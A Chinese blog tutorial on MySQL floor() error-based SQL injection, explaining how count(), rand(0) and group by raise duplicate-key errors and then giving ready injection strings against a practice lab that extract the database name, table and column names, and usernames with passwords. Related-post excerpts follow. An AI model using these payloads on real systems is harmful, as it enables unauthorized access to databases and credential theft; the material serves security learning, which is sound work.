SQL注入之floor报错注入

最新推荐文章于 2023-10-08 10:11:57 发布
最新推荐文章于 2023-10-08 10:11:57 发布
阅读量1.7k 收藏 10
点赞数 7
分类专栏: SQL注入 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46133275/article/details/120172340
版权

SQL注入之floor报错注入

原理

通过使用count()、floor()、rand()、group by四个条件形成主键重复的错误
count():计算满足某一条件下的行数
floor():向下取整的函数
rand():生成0~1之间的浮点数
count():group by:针对表中的字段来分组

一、count()函数、group by

在分组的情况下记录并输入每个分组的数量,不过在记录的过程中会先生成一个虚拟表,然后往虚拟表中插入数据

test表中有一个key字段,有四行数据,其中有两行是重复的
表中的数据
当我们根据key的值来分组并计算行数时,重复的会被计算两次,如图中的’ddd’,count()的结果为2

select `key` ,count(*) from test group by `key`

查询结果

二、floor()函数

向下取整

select floor(0.6),floor(1.9)

在这里插入图片描述

三、rand()函数

此时在test表中我增加了行数,目的是为了让rand()函数的结果显示多几行

如果不指定参数,可以生成0~1之间的随机浮点数

select rand() from test

在这里插入图片描述
如果指定参数为0,生成的就是伪随机数了(大家可以去尝试,看看得到的结果和我是否相同)

select rand(0) from test

在这里插入图片描述
如果配合上floor()函数结果就比较明确了

select floor(rand(0)*2) from test

这里我乘2的目的是生成0~2之间的浮点数(不包括2),然后经过floor()函数,最后得到结果要么是0,要么是1
在这里插入图片描述
可以看出,结果是:0 1 1 0 1 1 0 0 1 (请记住这一串数字)

四、报错初体验

select count(*),floor(rand(0)*2) x from test group by x

这条语句无论执行多少次都会报出这条错误,且内容不会改变
在这里插入图片描述
这里在floor()函数后面的x起到了一个起别名的作用,换句话说,x就等价于floor(rand()*2),前面有说到count()函数会生成一个虚拟表,就我这条SQL语句来说,虚拟表中会有两个字段,一个是字段是count()的结果,一个是字段存放x

那么这里是怎么导致报错的呢?
结合rand函数生成的数据,看图
在这里插入图片描述
在这里插入图片描述
所以,上面的报错语句中始终都是:Duplicate entry ‘1’ for key ‘<group_key>’
因为是插入1的时候产生的错误

五、报错注入

1、获取当前数据库

select 1 from (select count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2)) x from test group by x) a

在这里插入图片描述

2、获取当前用户

select 1 from (select count(*),concat(0x7e,(select user()),0x7e,floor(rand(0)*2)) x from test group by x) a

在这里插入图片描述

六、靶场报错注入

1、获取当前数据库

id=1' and (select 1 from (select count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2)) x from information_schema.tables group by x) a) %23

在这里插入图片描述

2、获取表名

id=1' and (select 1 from (select count(*),concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e,floor(rand(0)*2)) x from information_schema.tables group by x) a) %23

在这里插入图片描述

3、获取字段名

id=1' and (select 1 from (select count(*),concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e,floor(rand(0)*2)) x from information_schema.tables group by x) a) %23

在这里插入图片描述

4、获取字段内容

id=1' and (select 1 from (select count(*),concat(0x7e,(select concat_ws(':',username,password) from users limit 0,1),0x7e,floor(rand(0)*2)) x from information_schema.tables group by x) a) %23

在这里插入图片描述
注意这里的"limit 0,1"和concat_ws()的用法和含义

总结

对于floor()报错注入,我个人是认为有点投机的,正是因为rand(0)函数的伪随机性,才使得有报错的可能性

Ba22ett
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
SQL注入floor报错注入以及各个部分详细分析 + iwebsec 实例分析 + updatexml() 报错 + extractvalue() 报错
m0_50917178的博客
12-09 4050
文章目录前言一、什么是floor报错注入二、利用iwebsec模拟实际注入过程三、updatexml()和extractvalue()报错注入四、问题 前言 本文为作者的学习笔记,主要介绍了floor注入原理,利用注入代码(payload)分析每个部分的作用以此来解释floor注入的原理。在解释过程中会使用phpstudy搭建的MySQL环境,并且利用iwebsec漏洞库来实践。最后顺带介绍updatexml和extractvalue报错注入。 提示:以下是本篇文章正文内容,下面案例可供参考 一、什么是
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
基于联合查询的字符型GET注入
Z_l123的博客
02-16 1086
1.访问SQLi-Labs网站 访问Less-1,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-1/?id=1 2.寻找注入点 分别使用以下3条payload寻找注入点及判断注入点的类型: http://127.0.0.1/sqli-labs/Less-1/?id=1' 运行后报错! http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1 运行后正常显示! http:/.
Floor报错注入原理解析心得
qq_27130557的博客
10-22 2995
相关函数 1.floor() 向下取整。 即取不大于x的最大整数。取按照数轴上最接近要求值的左边值。 2.rand(x) 随机产生一个0-1之间的浮点数 当指定参数x之后,会生成固定的伪随机序列。即固定了参数,之后每次生成的值都是一样的,故称之为固定的伪随机数字(产生的数字都是可预知的) rand(0)*2 产生一个伪随机序列(结果已知),因为*2,所以返回结果只能是0或1 3.count(*) 返回值的条目,与count()的区别在于其不排除NULL,c..
Sql注入中 Group by rand() floor() Count(*)报错原理
weixin_42357645的博客
09-26 1023
Sql注入中 Group by rand() floor() Count(*)报错原理 一般组合为Group by floor(rand()*2) rand() 是个伪随机函数,产生的随机数有一定的规律可循。例如: select floor(rand(0)*2) from information_schema.columns; 这段语句产生的结果恒定不变始终是下面的序列: 结合count() 和group up 就可以爆出数据库名。 select count(*), concat(database(),f
sql报错注入
Ran_799的博客
07-10 373
简单的sql报错注入笔记
[SQL挖掘机] - 算术函数 - floor
统计小白er & paul_work
07-26 476
floor函数用于向下取整。它接受一个数字作为参数,并返回不大于该数字的最大整数。
Web安全之SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全之SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
SQL 常见函数整理 _ FLOOR() 向下取整函数
最新发布
gly1653810310的博客
10-08 666
SQL 中向下取整函数 FLOOR
报错注入分析之(count()、rand()、group by)分析,被大佬称为floor报错注入
aiquan9342的博客
12-27 252
PS:在这几天的学习当中很多的文章都将此注入方式称之为“floor报错分析”但经过我这几天的学习。个人觉得不该如此称呼!若君有意请详细阅读此篇文章。特别感谢米怀特的开导,说句实在的研究这个注入有四天了。有点不好意思说出来。其实就是一个语句的事情!但是确实研究四天了。之前实在的虽说口上弄懂了,但脑袋里还是混混沌沌的。也怪自己愚昧。加油吧。废话多了(。_。) 且看完整的payload:ht...
SQL注入报错注入floor、extractvalue、updatexml)
qq_60463414的博客
07-31 1760
sql注入报错注入
Sqli-labs16-20 十种mysql报错注入语句
Recar的博客
12-26 1816
十六题 基于时间的布尔盲注 双引号admin")#登陆成功uname=") or length((select database()))=8 #&passwd=1 修改 payload直接之前的脚本跑第十七题 更新查询报错这个页面是密码重置页面重置密码是更新操作update users set password=xxx where username=xxx看下 源码看到源码里面对 用户名进行了过滤
SQL注入实战之报错注入篇(updatexml extractvalue floor
qq_41272376的博客
03-03 1374
SQL注入实战之报错注入篇(updatexml extractvalue floor) 知识铺垫 在上一篇中我们在漏洞页面中进行了SQL注入实战之联合查询,这篇文章带来的是SQL注入报错注入篇。 首先我们来细分一下SQL注入分类 SQL注入分类: 回显正常—> 联合查询 union select 回显报错—> Duplicate entry() extractvalue()    updatexml() 盲注 —>布尔型盲注 基于时间的盲注sleep()
sql注入floor报错注入原理)
Bu2n的博客
12-16 1243
floor()报错 利用语句 需要配合联合查询 -1 union select count(*) from information_schema.tables group by concat(floor(rand(0)*2) ,database()) 原理 count(*)与group by配合使用过程会产生一张空的虚拟表,接着逐个查询group_key插入虚拟表中,插完调用count() 插入虚拟表过程 在查询数据的时候,首先判断虚拟表是否存在该分组,如果存在,计数器+1,不存在则新建该分组 floor(
SQL注入之报错型注入
梁顿的专栏
10-31 4999
介绍联合查询可以把我们想要的数据展示在网页上,替代网页上原有的数据内容;而今天我们要讨论的是,网页上没有展示查询结果的地方,也就是说select语句执行结果不能出现在网页上,我们需要让执行结果出现在其它地方,出现在哪呢?出现在报错语句中。 数据库返回到页面上的唯一信息就是,mysql错误。因此,我们需要以一种方式处理我们的查询,以便通过错误获取数据库信息。查询条件必须是正确的,能被后端数据库解释执
group by报错注入
7hinkSource的博客
08-10 1954
floor()报错注入 playload select (concat(database(),floor(rand(0)2)))x,concat() from information_schema.tables group by x; 函数 count(*)函数返回给定选择中被选的函数 concat()连接字符串 floor()向下取整 rand()随机数函数 rand(0)伪随机数,生成的随...
SQL注入中的报错注入
04-05
报错注入是一种利用SQL语句执行错误返回的方式来获取数据库信息的攻击手段。攻击者通过构造恶意的SQL语句,使得数据库系统在执行时出现错误,从而获得敏感信息或者执行非法操作。 报错注入的原理是利用数据库系统在执行SQL语句时,如果出现错误会返回错误信息的特性。攻击者通过构造恶意的SQL语句,使得数据库系统在执行时出现错误,从而返回错误信息。错误信息中可能包含有关数据库结构、表、列名、数据类型等敏感信息,攻击者可以根据这些信息进一步进行攻击。例如,攻击者可以通过报错注入获取管理员账户的密码,从而登录管理员账户并执行非法操作。 防范报错注入的方法包括: 1. 对用户输入的数据进行过滤和验证,确保输入数据的合法性和安全性。 2. 使用参数化查询或预编译语句,避免将用户输入的数据直接拼接到SQL语句中,从而避免SQL注入攻击。 3. 禁用或限制数据库系统返回错误信息的功能,从而避免敏感信息被攻击者获取。 4. 更新和维护数据库系统,及时修复已知的漏洞和安全问题,提高数据库系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值